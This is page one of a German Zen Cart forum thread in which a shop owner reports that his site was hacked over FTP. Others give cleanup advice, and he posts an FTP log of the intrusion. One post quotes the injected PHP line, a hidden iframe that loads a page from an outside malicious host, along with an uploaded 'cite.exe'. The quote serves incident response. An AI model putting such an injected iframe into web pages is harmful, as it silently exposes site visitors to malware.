Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 15

Thema: Dringend!!!! Trojaner auf der Homepage!!!!

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Padawan Stufe I Avatar von zendo
    Registriert seit
    22.01.2012
    Beiträge
    29
    Themen
    5
    DANKE
    0
    Erhaltene Danke: 0

    Standard Dringend!!!! Trojaner auf der Homepage!!!!

    Ich wurde vergangene Nacht gehackt!!!

    Im root und im Admin-Verzeichniss befindet sich ein Trojaner!

    Auf den Admin kann ich nicht mehr zugreifen!!!

    Oh mein Gott! Was nun???


    Das Ding heisst Variante von w32 "Injector ZVI Trojaner"

  2. #2
    Padawan Stufe III Avatar von Hawcha
    Registriert seit
    14.04.2011
    Beiträge
    217
    Themen
    17
    DANKE
    20
    Erhaltene Danke: 37

    Idee

    1. Ruhig bleiben
    2. Kaffee holen und tief durchatmen
    3. Diese Anleitung in Ruhe durcharbeiten

    https://www.zen-cart-pro.at/forum/th...-ich-jetzt-tun

    4. In Zukunft: Shop immer Immer updaten

  3. #3
    Padawan Stufe I Avatar von zendo
    Registriert seit
    22.01.2012
    Beiträge
    29
    Themen
    5
    DANKE
    0
    Erhaltene Danke: 0
    Erstellt von

    Standard

    Zitat Zitat von Hawcha Beitrag anzeigen
    1. Ruhig bleiben
    2. Kaffee holen und tief durchatmen
    3. Diese Anleitung in Ruhe durcharbeiten

    https://www.zen-cart-pro.at/forum/th...-ich-jetzt-tun

    4. In Zukunft: Shop immer Immer updaten
    Punkte 2 und 3 habe ich bestens auf die Reihe bekommen.

    Aber Punkt 1??? Ich könnte die Sau schlachten. Bei lebendigen Leib!!!

    Punkt 4: Der Shop war erst neu aufgespielt und es handelt sich um die 1.5er Version.

    Nach der Schritt-für-Schritt-Anleitung hier aus dem Forum abgesichert.


    Und Punkt 1 klappt immer noch nicht!!!


    Gruß


    Ralf

  4. #4
    Padawan Stufe VI Avatar von jjuno
    Registriert seit
    26.09.2008
    Beiträge
    758
    Themen
    14
    DANKE
    4
    Erhaltene Danke: 45

    Standard

    Abschließend würde ich noch das Shopverzeichnis herunter laden und die lokale Sicherung von deinem Shopverzeichnis mit
    einem Tool wie "WinMerge" (Windows) oder "Meld" (Linux) auf weitere Änderungen prüfen.

  5. #5
    Padawan Stufe I Avatar von zendo
    Registriert seit
    22.01.2012
    Beiträge
    29
    Themen
    5
    DANKE
    0
    Erhaltene Danke: 0
    Erstellt von

    Standard Und dass ist passiert

    Auszug aus der FTP-Log. Abgeändert habe ich die FTP-Zugangskennung auf "Loginname"

    Das Protokoll zieht sich durch bis 3706 Einträge.

    In der Accesslog taucht die IP-Adresse nicht einmal auf, dafür wird aber etwa 3 Minuten vor der Attacke eine IP angezeigt, die als

    "Pixray-Seeker/2.0 (Pixray-Seeker; +http://www.pixray.com/pixraybot; +crawlerpixray.com "angezeigt wird.

    exakt 1 Minute nach dem ANgriff taucht eine IP-Adresse auf, die als

    "Googlebot" identifiziert wird.

    Insgesamt hat die ganze Aktion nur knapp 8 bis 9 Minuten gedauert und mir mehr als 3 1/2 Stunden Arbeit verursacht.

    Die Datei "Cite.exe" fand sich in jedem Verzeichnis, in dem sich eine "
    index.htm, index.html, index.php, login.php und auch start.htm) befunden hat.

    Genau diese Dateien waren auch abgeändert mit Einträgen wie:

    <?php echo "<iframe src=\"http://sydneynorwestlimos.org:8080/index.php\" style=\"visibility: hidden; position: absolute; left: 0px; top: 0px; \" width=\"10\" height=\"10\"></iframe>"; echo "";

    ob es zudem noch andere Links gegeben hat, kann ich nicjht sagen. Ich weiß im Moment nur den einen, da ich alle anderen Dateien gleich gelöscht hatte.

    Zugang zur Seite war mit meinem FTP-Login, allerdings kann ich mir nicht vorstellen, dass das zugehörige Passwort geknackt worden sein soll, denn dieses bestand aus 12 Zeichen mit Buchstaben, Zahlen und Großkleinschreibung.




    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:43 +0100] "PASS (hidden)" 230 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "PWD" 257 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "PASV" 227 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "TYPE A" 200 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:45 +0100] "LIST" 226 19247
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:45 +0100] "PASV" 227 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "LIST" 226 19247
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "CWD /" 250 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "PASV" 227 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "TYPE I" 200 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "SIZE index.html" 213 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "RETR index.html" 226 6628
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "PASV" 227 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "STOR index.html" 226 6789
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "PASV" 227 -
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:49 +0100] "STOR cite.exe" 226 218768
    67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:49 +0100] "PASV" 227 -

  6. #6
    Jedi-Ritter Avatar von webchills
    Registriert seit
    30.10.2004
    Ort
    Österreich
    Beiträge
    6.093
    Themen
    85
    DANKE
    3
    Erhaltene Danke: 962

    Standard

    Zitat Zitat von zendo Beitrag anzeigen
    Zugang zur Seite war mit meinem FTP-Login, allerdings kann ich mir nicht vorstellen, dass das zugehörige Passwort geknackt worden sein soll, denn dieses bestand aus 12 Zeichen mit Buchstaben, Zahlen und Großkleinschreibung.
    In Zen-Cart sind nirgendwo Deine FTP Zugnagsdaten gespeichert weder in der Datenbank noch in irgendeinem File. Dieses Trojaner ist zu 99,9% nicht durch irgendeien Schwachstelle in Zen-Cart reingekommen.
    Welche Systeme laufen sonst noch auf Deinem Webspace?
    Was sagt Dein Provider dazu?
    !!! kostenloser Support ausschließlich im Forum - Nicht per Email, nicht per Telefon und nicht per PM !!!

  7. #7
    Padawan Stufe I Avatar von zendo
    Registriert seit
    22.01.2012
    Beiträge
    29
    Themen
    5
    DANKE
    0
    Erhaltene Danke: 0
    Erstellt von

    Standard

    Hi Webchills,

    der Provider sagt, das wäre eine gezielte Atacke mittels eines Brutforce-Programmes gewesen.

    Außer dem Shop läuft nur noch das phpbb-Forum.

  8. #8
    Jedi-Ritter Avatar von webchills
    Registriert seit
    30.10.2004
    Ort
    Österreich
    Beiträge
    6.093
    Themen
    85
    DANKE
    3
    Erhaltene Danke: 962

    Standard

    Ok. Zen-Cart hatte damit also nichts zu tun, das möcht ich hier nur festhalten, weil das ein Zen-Cart Forum ist.
    !!! kostenloser Support ausschließlich im Forum - Nicht per Email, nicht per Telefon und nicht per PM !!!

  9. #9
    Jedi-Ritter Avatar von webchills
    Registriert seit
    30.10.2004
    Ort
    Österreich
    Beiträge
    6.093
    Themen
    85
    DANKE
    3
    Erhaltene Danke: 962

    Standard

    @zendo
    Welcher Provider ist das?
    !!! kostenloser Support ausschließlich im Forum - Nicht per Email, nicht per Telefon und nicht per PM !!!

  10. #10
    Padawan Stufe I Avatar von zendo
    Registriert seit
    22.01.2012
    Beiträge
    29
    Themen
    5
    DANKE
    0
    Erhaltene Danke: 0
    Erstellt von

    Standard

    1und1

    Dualhosting

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. Chace index ist Trojaner drin
    Von azrailbey im Forum Sicherheit
    Antworten: 3
    Letzter Beitrag: 07.12.2012, 09:07
  2. Homepage und Shop
    Von Ronja im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 5
    Letzter Beitrag: 24.11.2010, 18:45
  3. Bilder Fehler auf der Homepage
    Von ocris im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 8
    Letzter Beitrag: 03.11.2009, 13:45
  4. Hersteller Homepage
    Von shoppingstobe im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 3
    Letzter Beitrag: 07.02.2009, 13:32
  5. kann man ein DB Backup via Homepage machen
    Von guladmin2 im Forum Archivierte Beiträge Zen-Cart Support
    Antworten: 3
    Letzter Beitrag: 08.10.2006, 21:53

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
zen-cart-pro.at
Zen Cart ist eine kostenlose unter der GPL-Lizenz veröffentlichte Open-Source Shopsoftware. Das System wird in den USA entwickelt, die amerikanische Website dazu ist www.zen-cart.com

Die deutsche Zen-Cart Version, um die es hier auf zen-cart-pro.at geht, ist eine Anpassung der amerikanischen Version an die Bedürfnisse von Onlineshopbetreibern im deutschsprachigen Raum.

Die deutsche Zen Cart Version wird von einem Team von Entwicklern in Österreich und Deutschland betreut, weiterentwickelt und supportet und steht kostenlos in unserem Downloadbereich zur Verfügung.

[mehr]
Follow Us
  • zen-cart-pro-at auf Twitter
  • zen-cart-pro-at auf Github
  • zen-cart-pro-at auf SourceForge
Aktuelle Version
Zen Cart 1.5.5 deutsch
Revision 1188 vom 02.12.2016
[Download]